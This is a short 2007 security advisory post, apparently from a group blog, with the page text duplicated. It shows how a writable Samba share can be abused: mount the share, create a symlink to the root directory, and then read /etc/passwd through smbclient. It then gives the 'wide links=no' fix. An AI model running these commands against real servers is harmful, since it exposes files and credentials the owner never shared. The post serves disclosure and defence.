Metaeye Security Group » 2007

Noticed a security issue with default samba configurations shipped with most Linux distros.

For example lets say we have a system A with a writable share XYZ. On an other system B,
we mount the share and create a link to /, i.e to the root directory.

[root@B] smbmount //A/XYZ /mnt/share -o username=test
Password:
[root@B] ln -s / /mnt/share/ROOT

Now using the smbclient tool to access the share

[root@B] smbclient -U test //A/XYZ
Password:
Domain=[A] OS=[Unix] Server=[Samba 3.0.26a]
smb: \> ls ROOT/etc/passwd
passwd 879 Tue Sep 4 16:11:56 2007
37760 blocks of size 1048576. 9355 blocks available
smb: \>

As you can see the whole file system is now accessible, the attacker can download all
accessible files across the file system on A.

To make sure this does not happen add the following directive to smb.conf in
[global] section.

wide links=no

| by warl0ck on June 21st, 2007 at 3:20 pm | permanent link |


home advisories codes projects hunch archives contact rss2	[ Archive for June, 2007 ] • Watch out for writable samba shares. Noticed a security issue with default samba configurations shipped with most Linux distros. For example lets say we have a system A with a writable share XYZ. On an other system B, we mount the share and create a link to /, i.e to the root directory. [root@B] smbmount //A/XYZ /mnt/share -o username=test Password: [root@B] ln -s / /mnt/share/ROOT Now using the smbclient tool to access the share [root@B] smbclient -U test //A/XYZ Password: Domain=[A] OS=[Unix] Server=[Samba 3.0.26a] smb: \> ls ROOT/etc/passwd passwd 879 Tue Sep 4 16:11:56 2007 37760 blocks of size 1048576. 9355 blocks available smb: \> As you can see the whole file system is now accessible, the attacker can download all accessible files across the file system on A. To make sure this does not happen add the following directive to smb.conf in [global] section. wide links=no \| by warl0ck on June 21st, 2007 at 3:20 pm \| permanent link \|
[ © MSG ]

[ Archive for June, 2007 ]